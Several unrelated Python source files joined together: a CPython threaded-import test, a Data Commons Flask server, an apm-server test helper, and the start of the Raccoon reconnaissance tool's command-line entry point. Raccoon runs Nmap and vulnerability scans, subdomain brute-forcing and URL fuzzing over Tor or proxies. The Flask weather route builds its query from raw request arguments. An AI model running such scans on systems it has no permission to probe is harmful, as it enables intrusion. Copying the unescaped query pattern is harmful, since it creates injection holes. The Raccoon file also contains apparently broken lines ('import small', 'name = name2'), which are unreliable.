if len(done_tasks) % 2:
import modulefinder
import random
else:
import random
import modulefinder
# This will fail if random is not completely initialized
x = random.randrange(1, 3)
except Exception as e:
errors.append(e.with_traceback(None))
finally:
done_tasks.append(threading.get_ident())
finished = len(done_tasks) == N
if finished:
done.set()
def mock_register_at_fork(func):
# bpo-30599: Mock os.register_at_fork() when importing the random module,
# since this function doesn't allow to unregister callbacks and would leak
# memory.
return mock.patch('os.register_at_fork', create=True)(func)
# Create a circular import structure: A -> C -> B -> D -> A
# NOTE: `time` is already loaded and therefore doesn't threaten to deadlock.
circular_imports_modules = {
'A': """if 1:
import time
time.sleep(%(delay)s)
x = 'a'
import C
""",
'B': """if 1:
import time
time.sleep(%(delay)s)
x = 'b'
import D
""",
'C': """import B""",
'D': """import A""",
}
class Finder:
"""A dummy finder to detect concurrent access to its find_spec()
method."""
def __init__(self):
self.numcalls = 0
self.x = 0
self.lock = threading.Lock()
def find_spec(self, name, path=None, target=None):
# Simulate some thread-unsafe behaviour. If calls to find_spec()
# are properly serialized, `x` will end up the same as `numcalls`.
# Otherwise not.
assert imp.lock_held()
with self.lock:
self.numcalls += 1
x = self.x
time.sleep(0.01)
self.x = x + 1
class FlushingFinder:
"""A dummy finder which flushes sys.path_importer_cache when it gets
called."""
def find_spec(self, name, path=None, target=None):
sys.path_importer_cache.clear()
class ThreadedImportTests(unittest.TestCase):
def setUp(self):
self.old_random = sys.modules.pop('random', None)
def tearDown(self):
# If the `random` module was already initialized, we restore the
# old module at the end so that pickling tests don't fail.
# See http://bugs.python.org/issue3657#msg110461
if self.old_random is not None:
sys.modules['random'] = self.old_random
@mock_register_at_fork
def check_parallel_module_init(self, mock_os):
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done = threading.Event()
for N in (20, 50) * 3:
if verbose:
print("Trying", N, "threads ...", end=' ')
# Make sure that random and modulefinder get reimported freshly
for modname in ['random', 'modulefinder']:
try:
del sys.modules[modname]
except KeyError:
pass
errors = []
done_tasks = []
done.clear()
t0 = time.monotonic()
with start_threads(threading.Thread(target=task,
args=(N, done, done_tasks, errors,))
for i in range(N)):
pass
completed = done.wait(10 * 60)
dt = time.monotonic() - t0
if verbose:
print("%.1f ms" % (dt*1e3), flush=True, end=" ")
dbg_info = 'done: %s/%s' % (len(done_tasks), N)
self.assertFalse(errors, dbg_info)
self.assertTrue(completed, dbg_info)
if verbose:
print("OK.")
def test_parallel_module_init(self):
self.check_parallel_module_init()
def test_parallel_meta_path(self):
finder = Finder()
sys.meta_path.insert(0, finder)
try:
self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(finder)
def test_parallel_path_hooks(self):
# Here the Finder instance is only used to check concurrent calls
# to path_hook().
finder = Finder()
# In order for our path hook to be called at each import, we need
# to flush the path_importer_cache, which we do by registering a
# dedicated meta_path entry.
flushing_finder = FlushingFinder()
def path_hook(path):
finder.find_spec('')
raise ImportError
sys.path_hooks.insert(0, path_hook)
sys.meta_path.append(flushing_finder)
try:
# Flush the cache a first time
flushing_finder.find_spec('')
numtests = self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(flushing_finder)
sys.path_hooks.remove(path_hook)
def test_import_hangers(self):
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
try:
del sys.modules['test.threaded_import_hangers']
except KeyError:
pass
import test.threaded_import_hangers
self.assertFalse(test.threaded_import_hangers.errors)
def test_circular_imports(self):
# The goal of this test is to exercise implementations of the import
# lock which use a per-module lock, rather than a global lock.
# In these implementations, there is a possible deadlock with
# circular imports, for example:
# - thread 1 imports A (grabbing the lock for A) which imports B
# - thread 2 imports B (grabbing the lock for B) which imports A
# Such implementations should be able to detect such situations and
# resolve them one way or the other, without freezing.
# NOTE: our test constructs a slightly less trivial import cycle,
# in order to better stress the deadlock avoidance mechanism.
delay = 0.5
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
for name, contents in circular_imports_modules.items():
contents = contents % {'delay': delay}
with open(os.path.join(TESTFN, name + ".py"), "wb") as f:
f.write(contents.encode('utf-8'))
self.addCleanup(forget, name)
importlib.invalidate_caches()
results = []
def import_ab():
import A
results.append(getattr(A, 'x', None))
def import_ba():
import B
results.append(getattr(B, 'x', None))
t1 = threading.Thread(target=import_ab)
t2 = threading.Thread(target=import_ba)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(set(results), {'a', 'b'})
@mock_register_at_fork
def test_side_effect_import(self, mock_os):
code = """if 1:
import threading
def target():
import random
t = threading.Thread(target=target)
t.start()
t.join()
t = None"""
sys.path.insert(0, os.curdir)
self.addCleanup(sys.path.remove, os.curdir)
filename = TESTFN + ".py"
with open(filename, "wb") as f:
f.write(code.encode('utf-8'))
self.addCleanup(unlink, filename)
self.addCleanup(forget, TESTFN)
self.addCleanup(rmtree, '__pycache__')
importlib.invalidate_caches()
__import__(TESTFN)
del sys.modules[TESTFN]
@reap_threads
def test_main():
old_switchinterval = None
try:
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
except AttributeError:
pass
try:
run_unittest(ThreadedImportTests)
finally:
if old_switchinterval is not None:
sys.setswitchinterval(old_switchinterval)
if __name__ == "__main__":
test_main()
|
main.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main entry module specified in app.yaml.
This module contains the request handler codes and the main app.
"""
import json
import logging
import os
import requests
import sys
import threading
import time
import flask
from flask import request
import services.datacommons as dc
from __init__ import create_app
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(lineno)d : %(message)s')
app = create_app()
app.jinja_env.globals['GA_ACCOUNT'] = app.config['GA_ACCOUNT']
app.jinja_env.globals['FEEDING_AMERICA'] = app.config['FEEDING_AMERICA']
app.jinja_env.globals['SUSTAINABILITY'] = app.config['SUSTAINABILITY']
app.jinja_env.globals['NAME'] = app.config['NAME']
app.jinja_env.globals['BASE_HTML'] = (
'sustainability/base.html' if app.config['SUSTAINABILITY'] else 'base.html')
WARM_UP_ENDPOINTS = [
"/api/choropleth/geojson?placeDcid=country/USA&placeType=County",
"/api/place/parent/country/USA",
"/api/place/places-in-names?dcid=country/USA&placeType=County",
"/api/stats/set/series/within-place?parent_place=country/USA&child_type=County&stat_vars=Count_Person",
]
def send_warmup_requests():
logging.info("Sending warm up requests:")
for endpoint in WARM_UP_ENDPOINTS:
while True:
try:
resp = requests.get("http://127.0.0.1:8080" + endpoint)
if resp.status_code == 200:
break
except:
pass
time.sleep(1)
@app.before_request
def before_request():
scheme = request.headers.get('X-Forwarded-Proto')
if scheme and scheme == 'http' and request.url.startswith('http://'):
url = request.url.replace('http://', 'https://', 1)
code = 301
return flask.redirect(url, code=code)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/translator')
def translator_handler():
return flask.render_template('translator.html')
@app.route('/healthz')
def healthz():
return "very healthy"
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/weather')
def get_weather():
dcid = request.args.get('dcid')
prop = request.args.get('prop')
period = request.args.get('period')
if not dcid:
flask.abort(400, 'Missing url parameter "dcid"')
if not prop:
flask.abort(400, 'Missing url parameter "prop"')
if not period:
flask.abort(400, 'Missing url parameter "period"')
query_string = ('SELECT ?date ?mean ?unit ?provId '
'WHERE {{'
' ?o typeOf {period}WeatherObservation .'
' ?o observedNode {dcid} .'
' ?o measuredProperty {prop} .'
' ?o observationDate ?date .'
' ?o unit ?unit .'
' ?o meanValue ?mean .'
' ?o provenance ?provId .}}').format(period=period,
dcid=dcid,
prop=prop)
_, rows = dc.query(query_string)
observations = []
for row in rows:
if ('value' not in row['cells'][0] or 'value' not in row['cells'][1] or
'value' not in row['cells'][2]):
continue
date = row['cells'][0]['value']
if date < '2000':
continue
text = 'mean {}: {} {}'.format(prop, row['cells'][1]['value'],
row['cells'][2]['value'])
observations.append({
'measuredProperty': prop,
'observationDate': date,
'meanValue': row['cells'][1]['value'],
'unit': row['cells'][2]['value'],
'text': text,
'provId': row['cells'][3]['value'],
})
return json.dumps(observations)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/mcf_playground')
def mcf_playground():
return flask.render_template('mcf_playground.html')
# TODO(shifucun): get branch cache version from mixer
@app.route('/version')
def version():
mixer_version = dc.version()
return flask.render_template('version.html',
website_hash=os.environ.get("WEBSITE_HASH"),
mixer_hash=mixer_version['gitHash'],
tables=mixer_version['tables'],
bigquery=mixer_version['bigQuery'])
if not (app.config["TEST"] or app.config["WEBDRIVER"] or app.config["LOCAL"]):
thread = threading.Thread(target=send_warmup_requests)
thread.start()
if __name__ == '__main__':
# This is used when running locally only. When deploying to GKE,
# a webserver process such as Gunicorn will serve the app.
logging.info("Run web server in local mode")
port = sys.argv[1] if len(sys.argv) >= 2 else 8080
app.run(host='127.0.0.1', port=port, debug=True)
|
apmserver.py
|
from datetime import datetime, timedelta
import json
import os
import re
import shutil
import subprocess
import sys
import threading
import time
import unittest
from urllib.parse import urlparse
from elasticsearch import Elasticsearch, NotFoundError
import requests
# Add libbeat/tests/system to the import path.
output = subprocess.check_output(["go", "list", "-m", "-f", "{{.Path}} {{.Dir}}", "all"]).decode("utf-8")
beats_line = [line for line in output.splitlines() if line.startswith("github.com/snappyflow/beats/")][0]
beats_dir = beats_line.split(" ", 2)[1]
sys.path.append(os.path.join(beats_dir, 'libbeat', 'tests', 'system'))
from beat.beat import INTEGRATION_TESTS, TestCase, TimeoutError
from helper import wait_until
from es_helper import cleanup, default_pipelines
from es_helper import index_smap, index_span, index_error, apm_prefix
from kibana import Kibana
integration_test = unittest.skipUnless(INTEGRATION_TESTS, "integration test")
diagnostic_interval = float(os.environ.get('DIAGNOSTIC_INTERVAL', 0))
class BaseTest(TestCase):
maxDiff = None
def setUp(self):
super(BaseTest, self).setUp()
# TODO: move to Mixin and use only in tests where self.es is available
self.setup_diagnostics()
def setup_diagnostics(self):
if diagnostic_interval <= 0:
return
self.addCleanup(self.cleanup_diagnostics)
self.diagnostics_path = os.path.join(self.working_dir, "diagnostics")
os.makedirs(self.diagnostics_path)
self.running = True
self.diagnostic_thread = threading.Thread(
target=self.dump_diagnotics, kwargs=dict(interval=diagnostic_interval))
self.diagnostic_thread.daemon = True
self.diagnostic_thread.start()
def cleanup_diagnostics(self):
self.running = False
self.diagnostic_thread.join(timeout=30)
def dump_diagnotics(self, interval=2):
while self.running:
# TODO: use threading.Timer instead to not block tearDown
time.sleep(interval)
with open(os.path.join(self.diagnostics_path,
datetime.now().strftime("%Y%m%d_%H%M%S") + ".hot_threads"), mode="w") as out:
try:
out.write(self.es.nodes.hot_threads(threads=99999))
except Exception as e:
out.write("failed to query hot threads: {}\n".format(e))
with open(os.path.join(self.diagnostics_path,
datetime.now().strftime("%Y%m%d_%H%M%S") + ".tasks"), mode="w") as out:
try:
json.dump(self.es.tasks.list(), out, indent=True, sort_keys=True)
except Exception as e:
out.write("failed to query tasks: {}\n".format(e))
@classmethod
def setUpClass(cls):
cls.beat_name = "apm-server"
cls.beat_path = os.path.abspath(os.path.join(
os.path.dirname(__file__), "..", ".."))
cls.build_path = cls._beat_path_join("build", "system-tests")
super(BaseTest, cls).setUpClass()
@classmethod
def _beat_path_join(cls, *paths):
return os.path.abspath(os.path.join(cls.beat_path, *paths))
@staticmethod
def get_elasticsearch_url(user="", password=""):
"""
Returns an elasticsearch URL including username and password
"""
host = os.getenv("ES_HOST", "localhost")
if not user:
user = os.getenv("ES_USER", "apm_server_user")
if not password:
password = os.getenv("ES_PASS", "changeme")
if user and password:
host = user + ":" + password + "@" + host
return "http://{host}:{port}".format(
host=host,
port=os.getenv("ES_PORT", "9200"),
)
@staticmethod
def get_kibana_url(user="", password=""):
"""
Returns kibana URL including username and password
"""
host = os.getenv("KIBANA_HOST", "localhost")
if not user:
user = os.getenv("KIBANA_USER", "apm_user_ro")
if not password:
password = os.getenv("KIBANA_PASS", "changeme")
if user and password:
host = user + ":" + password + "@" + host
return "http://{host}:{port}".format(
host=host,
port=os.getenv("KIBANA_PORT", "5601"),
)
def get_payload_path(self, name):
return self.get_testdata_path('intake-v2', name)
def get_testdata_path(self, *names):
return self._beat_path_join('testdata', *names)
def get_payload(self, name):
with open(self.get_payload_path(name)) as f:
return f.read()
def get_error_payload_path(self):
return self.get_payload_path("errors_2.ndjson")
def get_transaction_payload_path(self):
return self.get_payload_path("transactions.ndjson")
def get_metricset_payload_path(self):
return self.get_payload_path("metricsets.ndjson")
def get_event_payload(self, name="events.ndjson"):
return self.get_payload(name)
def ilm_index(self, index):
return "{}-000001".format(index)
class ServerBaseTest(BaseTest):
config_overrides = {}
host = "http://localhost:8200"
root_url = "{}/".format(host)
agent_config_url = "{}/{}".format(host, "config/v1/agents")
rum_agent_config_url = "{}/{}".format(host, "config/v1/rum/agents")
intake_url = "{}/{}".format(host, 'intake/v2/events')
rum_intake_url = "{}/{}".format(host, 'intake/v2/rum/events')
sourcemap_url = "{}/{}".format(host, 'assets/v1/sourcemaps')
expvar_url = "{}/{}".format(host, 'debug/vars')
jaeger_grpc_host = "localhost:14250"
jaeger_http_host = "localhost:14268"
jaeger_http_url = "http://{}/{}".format(jaeger_http_host, 'api/traces')
def config(self):
cfg = {"ssl_enabled": "false",
"queue_flush": 0,
"jaeger_grpc_enabled": "true",
"jaeger_grpc_host": self.jaeger_grpc_host,
"jaeger_http_enabled": "true",
"jaeger_http_host": self.jaeger_http_host,
"path": os.path.abspath(self.working_dir) + "/log/*"}
cfg.update(self.config_overrides)
return cfg
def setUp(self):
super(ServerBaseTest, self).setUp()
# Copy ingest pipeline definition to home directory of the test.
# The pipeline definition is expected to be at a specific location
# relative to the home dir. This ensures that the file can be loaded
# for all installations (deb, tar, ..).
pipeline_dir = os.path.join("ingest", "pipeline")
pipeline_def = os.path.join(pipeline_dir, "definition.json")
target_dir = os.path.join(self.working_dir, pipeline_dir)
if not os.path.exists(target_dir):
os.makedirs(target_dir)
shutil.copy(self._beat_path_join(pipeline_def), target_dir)
self.render_config_template(**self.config())
self.start_proc()
self.wait_until_started()
def start_proc(self):
self.apmserver_proc = self.start_beat(**self.start_args())
self.addCleanup(self.stop_proc)
def stop_proc(self):
self.apmserver_proc.check_kill_and_wait()
def start_args(self):
return {}
def wait_until_started(self):
wait_until(lambda: self.log_contains("Starting apm-server"), name="apm-server started")
def assert_no_logged_warnings(self, suppress=None):
"""
Assert that the log file contains no ERR or WARN lines.
"""
if suppress == None:
suppress = []
# Jenkins runs as a Windows service and when Jenkins executes theses
# tests the Beat is confused since it thinks it is running as a service.
winErr = "ERR Error: The service process could not connect to the service controller."
corsWarn = "WARN\t.*CORS related setting .* Consider more restrictive setting for production use."
suppress = suppress + ["WARN EXPERIMENTAL", "WARN BETA", "WARN.*deprecated", winErr, corsWarn]
log = self.get_log()
for s in suppress:
log = re.sub(s, "", log)
self.assertNotRegex(log, "ERR|WARN")
def request_intake(self, data=None, url=None, headers=None):
if not url:
url = self.intake_url
if data is None:
data = self.get_event_payload()
if headers is None:
headers = {'content-type': 'application/x-ndjson'}
return requests.post(url, data=data, headers=headers)
class ElasticTest(ServerBaseTest):
skip_clean_pipelines = False
def config(self):
cfg = super(ElasticTest, self).config()
cfg.update({
"elasticsearch_host": self.get_elasticsearch_url(),
"file_enabled": "false",
"kibana_enabled": "false",
})
cfg.update(self.config_overrides)
return cfg
def setUp(self):
admin_user = os.getenv("ES_SUPERUSER_USER", "admin")
admin_password = os.getenv("ES_SUPERUSER_PASS", "changeme")
self.admin_es = Elasticsearch([self.get_elasticsearch_url(admin_user, admin_password)])
self.es = Elasticsearch([self.get_elasticsearch_url()])
self.kibana = Kibana(self.get_kibana_url())
delete_pipelines = [] if self.skip_clean_pipelines else default_pipelines
cleanup(self.admin_es, delete_pipelines=delete_pipelines)
self.kibana.delete_all_agent_config()
super(ElasticTest, self).setUp()
# try make sure APM Server is fully up
self.wait_until_ilm_logged()
self.wait_until_pipeline_logged()
def wait_until_ilm_logged(self):
setup_enabled = self.config().get("ilm_setup_enabled")
msg = "Finished index management setup." if setup_enabled != "false" else "Manage ILM setup is disabled."
wait_until(lambda: self.log_contains(msg), name="ILM setup")
def wait_until_pipeline_logged(self):
registration_enabled = self.config().get("register_pipeline_enabled")
msg = "Registered Ingest Pipelines successfully" if registration_enabled != "false" else "No pipeline callback registered"
wait_until(lambda: self.log_contains(msg), name="pipelines registration")
def load_docs_with_template(self, data_path, url, endpoint, expected_events_count,
query_index=None, max_timeout=10, extra_headers=None, file_mode="rb"):
if query_index is None:
query_index = apm_prefix
headers = {'content-type': 'application/x-ndjson'}
if extra_headers:
headers.update(extra_headers)
with open(data_path, file_mode) as f:
r = requests.post(url, data=f, headers=headers)
assert r.status_code == 202, r.status_code
# Wait to give documents some time to be sent to the index
self.wait_for_events(endpoint, expected_events_count, index=query_index, max_timeout=max_timeout)
def wait_for_events(self, processor_name, expected_count, index=None, max_timeout=10):
"""
wait_for_events waits for an expected number of event docs with the given
'processor.name' value, and returns the hits when found.
"""
if index is None:
index = apm_prefix
query = {"term": {"processor.name": processor_name}}
result = {} # TODO(axw) use "nonlocal" when we migrate to Python 3
def get_docs():
hits = self.es.search(index=index, body={"query": query})['hits']
result['docs'] = hits['hits']
return hits['total']['value'] == expected_count
wait_until(get_docs,
max_timeout=max_timeout,
name="{} documents to reach {}".format(processor_name, expected_count),
)
return result['docs']
def check_backend_error_sourcemap(self, index, count=1):
rs = self.es.search(index=index, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
err = doc["_source"]["error"]
for exception in err.get("exception", []):
self.check_for_no_smap(exception)
if "log" in err:
self.check_for_no_smap(err["log"])
def check_backend_span_sourcemap(self, count=1):
rs = self.es.search(index=index_span, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
self.check_for_no_smap(doc["_source"]["span"])
def check_for_no_smap(self, doc):
if "stacktrace" not in doc:
return
for frame in doc["stacktrace"]:
assert "sourcemap" not in frame, frame
def logged_requests(self, url="/intake/v2/events"):
for line in self.get_log_lines():
jline = json.loads(line)
u = urlparse(jline.get("URL", ""))
if jline.get("logger") == "request" and u.path == url:
yield jline
def approve_docs(self, base_path, received):
"""
approve_docs compares the received documents to those contained
in the file at ${base_path}.approved.json. If that file does not
exist, then it is considered equivalent to a lack of documents.
Only the document _source is compared, and we ignore differences
in some context-sensitive fields such as the "observer", which
may vary between test runs.
"""
base_path = self._beat_path_join(os.path.dirname(__file__), base_path)
approved_path = base_path + '.approved.json'
received_path = base_path + '.received.json'
try:
with open(approved_path) as f:
approved = json.load(f)
except IOError:
approved = []
# get_doc_id returns a value suitable for sorting and identifying
# documents: either a unique ID, or a timestamp. This is necessary
# since not all event types require a unique ID (namely, errors do
# not.)
#
# We return (0, doc['error']['id']) when the event type is 'error'
# if that field exists, otherwise returns (1, doc['@timestamp']).
# The first tuple element exists to sort IDs before timestamps.
def get_doc_id(doc):
doc_type = doc['processor']['event']
if 'id' in doc.get(doc_type, {}):
return (0, doc[doc_type]['id'])
if doc_type == 'metric' and 'transaction' in doc:
transaction = doc['transaction']
if 'histogram' in transaction.get('duration', {}):
# Transaction histogram documents are published periodically
# by the apm-server, so we cannot use the timestamp. Instead,
# use the transaction name, type, and result (a subset of the
# full aggregation key, but good enough for our tests).
fields = [transaction.get(field, '') for field in ('type', 'name', 'result')]
return (1, '_'.join(fields))
return (2, doc['@timestamp'])
received = [doc['_source'] for doc in received]
received.sort(key=get_doc_id)
try:
for rec in received:
# Overwrite received observer values with the approved ones,
# in order to avoid noise in the 'approvals' diff if there are
# any other changes.
#
# We don't compare the observer values between received/approved,
# as they are dependent on the environment.
rec_id = get_doc_id(rec)
rec_observer = rec['observer']
self.assertEqual(set(rec_observer.keys()), set(
["hostname", "version", "id", "ephemeral_id", "type", "version_major"]))
assert rec_observer["version"].startswith(str(rec_observer["version_major"]) + ".")
for appr in approved:
if get_doc_id(appr) == rec_id:
rec['observer'] = appr['observer']
# ensure both docs have the same event keys set
self.assertEqual(rec.get("event", {}).keys(), appr.get("event", {}).keys())
# We don't compare the event values between received/approved
# as they are dependent on the environment.
if 'event' in rec:
rec['event'] = appr['event']
break
assert len(received) == len(approved)
for i, rec in enumerate(received):
appr = approved[i]
rec_id = get_doc_id(rec)
assert rec_id == get_doc_id(appr), "New entry with id {}".format(rec_id)
for k, v in rec.items():
self.assertEqual(v, appr[k])
except Exception as exc:
with open(received_path, 'w') as f:
json.dump(received, f, indent=4, separators=(',', ': '), sort_keys=True)
# Create a dynamic Exception subclass so we can fake its name to look like the original exception.
class ApprovalException(Exception):
def __init__(self, cause):
super(ApprovalException, self).__init__(cause.args)
def __str__(self):
return "{}\n\nReceived data differs from approved data. Run 'make update check-approvals' to verify the diff.".format(self.args)
ApprovalException.__name__ = type(exc).__name__
raise ApprovalException(exc).with_traceback(sys.exc_info()[2])
class ClientSideBaseTest(ServerBaseTest):
sourcemap_url = 'http://localhost:8200/assets/v1/sourcemaps'
intake_url = 'http://localhost:8200/intake/v2/rum/events'
backend_intake_url = 'http://localhost:8200/intake/v2/events'
config_overrides = {}
def config(self):
cfg = super(ClientSideBaseTest, self).config()
cfg.update({"enable_rum": "true",
"kibana_enabled": "false",
"smap_cache_expiration": "200"})
cfg.update(self.config_overrides)
return cfg
def get_backend_error_payload_path(self, name="errors_2.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def get_backend_transaction_payload_path(self, name="transactions_spans.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def get_error_payload_path(self, name="errors_rum.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def get_transaction_payload_path(self, name="transactions_spans_rum_2.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
class ClientSideElasticTest(ClientSideBaseTest, ElasticTest):
def check_rum_error_sourcemap(self, updated, expected_err=None, count=1):
rs = self.es.search(index=index_error, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
err = doc["_source"]["error"]
for exception in err.get("exception", []):
self.check_smap(exception, updated, expected_err)
if "log" in err:
self.check_smap(err["log"], updated, expected_err)
def check_rum_transaction_sourcemap(self, updated, expected_err=None, count=1):
rs = self.es.search(index=index_span, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
span = doc["_source"]["span"]
self.check_smap(span, updated, expected_err)
@staticmethod
def check_smap(doc, updated, err=None):
if "stacktrace" not in doc:
return
for frame in doc["stacktrace"]:
smap = frame["sourcemap"]
if err is None:
assert 'error' not in smap
else:
assert err in smap["error"]
assert smap["updated"] == updated
class CorsBaseTest(ClientSideBaseTest):
def config(self):
cfg = super(CorsBaseTest, self).config()
cfg.update({"allow_origins": ["http://www.elastic.co"]})
return cfg
class ExpvarBaseTest(ServerBaseTest):
config_overrides = {}
def config(self):
cfg = super(ExpvarBaseTest, self).config()
cfg.update(self.config_overrides)
return cfg
def get_debug_vars(self):
return requests.get(self.expvar_url)
class SubCommandTest(ServerBaseTest):
config_overrides = {}
def config(self):
cfg = super(SubCommandTest, self).config()
cfg.update({
"elasticsearch_host": self.get_elasticsearch_url(),
"file_enabled": "false",
})
cfg.update(self.config_overrides)
return cfg
def wait_until_started(self):
self.apmserver_proc.check_wait()
# command and go test output is combined in log, pull out the command output
log = self.get_log()
pos = -1
for _ in range(2):
# export always uses \n, not os.linesep
pos = log[:pos].rfind("\n")
self.command_output = log[:pos]
for trimmed in log[pos:].strip().splitlines():
# ensure only skipping expected lines
assert trimmed.split(None, 1)[0] in ("PASS", "coverage:"), trimmed
def stop_proc(self):
return
class ProcStartupFailureTest(ServerBaseTest):
def stop_proc(self):
try:
self.apmserver_proc.kill_and_wait()
except:
self.apmserver_proc.wait()
def wait_until_started(self):
return
|
main.py
|
import time
import asyncio
import threading
import click
import os
import small
from raccoon_src.utils.coloring import COLOR, COLORED_COMBOS
from raccoon_src.utils.exceptions import RaccoonException, HostHandlerException
from raccoon_src.utils.request_handler import RequestHandler
from raccoon_src.utils.logger import SystemOutLogger
from raccoon_src.utils.help_utils import HelpUtilities
from raccoon_src.lib.fuzzer import URLFuzzer
from raccoon_src.lib.host import Host
from raccoon_src.lib.scanner import Scanner, NmapScan, NmapVulnersScan, VulnersScanner
from raccoon_src.lib.sub_domain import SubDomainEnumerator
from raccoon_src.lib.dns_handler import DNSHandler
from raccoon_src.lib.waf import WAF
from raccoon_src.lib.tls import TLSHandler
from raccoon_src.lib.web_app import WebApplicationScanner
# Set path for relative access to builtin files.
MY_PATH = os.path.abspath(os.path.dirname(__file__))
name = name2
def intro(logger):
logger.info("""{}
_____ _____ _____ ____ ____ _ _
| __ \ /\ / ____| / ____| / __ \ / __ \ | \ | |
| |__) | / \ | | | | | | | | | | | | | \| |
| _ / / /\ \ | | | | | | | | | | | | | . ` |
| | \ \ / ____ \ | |____ | |____ | |__| | | |__| | | |\ |
|_| \_\ /_/ \_\ \_____| \_____| \____/ \____/ |_| \_|
{}
4841434b414c4c5448455448494e4753
https://github.com/evyatarmeged/Raccoon
-------------------------------------------------------------------
""".format(COLOR.GRAY, COLOR.RESET))
@click.command()
@click.version_option("0.8.5")
@click.argument("target")
@click.option("-d", "--dns-records", default="A,MX,NS,CNAME,SOA,TXT",
help="Comma separated DNS records to query. Defaults to: A,MX,NS,CNAME,SOA,TXT")
@click.option("--tor-routing", is_flag=True, help="Route HTTP traffic through Tor (uses port 9050)."
" Slows total runtime significantly")
@click.option("--proxy-list", help="Path to proxy list file that would be used for routing HTTP traffic."
" A proxy from the list will be chosen at random for each request."
" Slows total runtime")
@click.option("-c", "--cookies", help="Comma separated cookies to add to the requests. "
"Should be in the form of key:value\n"
"Example: PHPSESSID:12345,isMobile:false")
@click.option("--proxy", help="Proxy address to route HTTP traffic through. Slows total runtime")
@click.option("-w", "--wordlist", default=os.path.join(MY_PATH, "wordlists/fuzzlist"),
help="Path to wordlist that would be used for URL fuzzing")
@click.option("-T", "--threads", default=25,
help="Number of threads to use for URL Fuzzing/Subdomain enumeration. Default: 25")
@click.option("--ignored-response-codes", default="302,400,401,402,403,404,503,504",
help="Comma separated list of HTTP status code to ignore for fuzzing."
" Defaults to: 302,400,401,402,403,404,503,504")
@click.option("--subdomain-list", default=os.path.join(MY_PATH, "wordlists/subdomains"),
help="Path to subdomain list file that would be used for enumeration")
@click.option("-sc", "--scripts", is_flag=True, help="Run Nmap scan with -sC flag")
@click.option("-sv", "--services", is_flag=True, help="Run Nmap scan with -sV flag")
@click.option("-f", "--full-scan", is_flag=True, help="Run Nmap scan with both -sV and -sC")
@click.option("-p", "--port", help="Use this port range for Nmap scan instead of the default")
@click.option("--vulners-nmap-scan", is_flag=True, help="Perform an NmapVulners scan. "
"Runs instead of the regular Nmap scan and is longer.")
@click.option("--vulners-path", default=os.path.join(MY_PATH, "utils/misc/vulners.nse"),
help="Path to the custom nmap_vulners.nse script."
"If not used, Raccoon uses the built-in script it ships with.")
@click.option("-fr", "--follow-redirects", is_flag=True, default=False,
help="Follow redirects when fuzzing. Default: False (will not follow redirects)")
@click.option("--tls-port", default=443, help="Use this port for TLS queries. Default: 443")
@click.option("--skip-health-check", is_flag=True, help="Do not test for target host availability")
@click.option("--no-url-fuzzing", is_flag=True, help="Do not fuzz URLs")
@click.option("--no-sub-enum", is_flag=True, help="Do not bruteforce subdomains")
@click.option("--skip-nmap-scan", is_flag=True, help="Do not perform an Nmap scan")
# @click.option("-d", "--delay", default="0.25-1",
# help="Min and Max number of seconds of delay to be waited between requests\n"
# "Defaults to Min: 0.25, Max: 1. Specified in the format of Min-Max")
@click.option("-q", "--quiet", is_flag=True, help="Do not output to stdout")
@click.option("-o", "--outdir", default="Raccoon_scan_results",
help="Directory destination for scan output")
def main(target,
tor_routing,
proxy_list,
proxy,
cookies,
dns_records,
wordlist,
threads,
ignored_response_codes,
subdomain_list,
full_scan,
scripts,
services,
port,
vulners_nmap_scan,
vulners_path,
tls_port,
skip_health_check,
follow_redirects,
no_url_fuzzing,
no_sub_enum,
skip_nmap_scan,
# delay,
outdir,
quiet):
try:
# ------ Arg validation ------
# Set logging level and Logger instance
log_level = HelpUtilities.determine_verbosity(quiet)
logger = SystemOutLogger(log_level)
intro(logger)
target = target.lower()
try:
HelpUtilities.validate_executables()
except RaccoonException as e:
logger.critical(str(e))
exit(9)
HelpUtilities.validate_wordlist_args(proxy_list, wordlist, subdomain_list)
HelpUtilities.validate_proxy_args(tor_routing, proxy, proxy_list)
HelpUtilities.create_output_directory(outdir)
#variable
if tor_routing:
logger.info("{} Testing that Tor service is up...".format(COLORED_COMBOS.NOTIFY))
elif proxy_list:
if proxy_list and not os.path.isfile(proxy_list):
raise FileNotFoundError("Not a valid file path, {}".format(proxy_list))
else:
logger.info("{} Routing traffic using proxies from list {}\n".format(
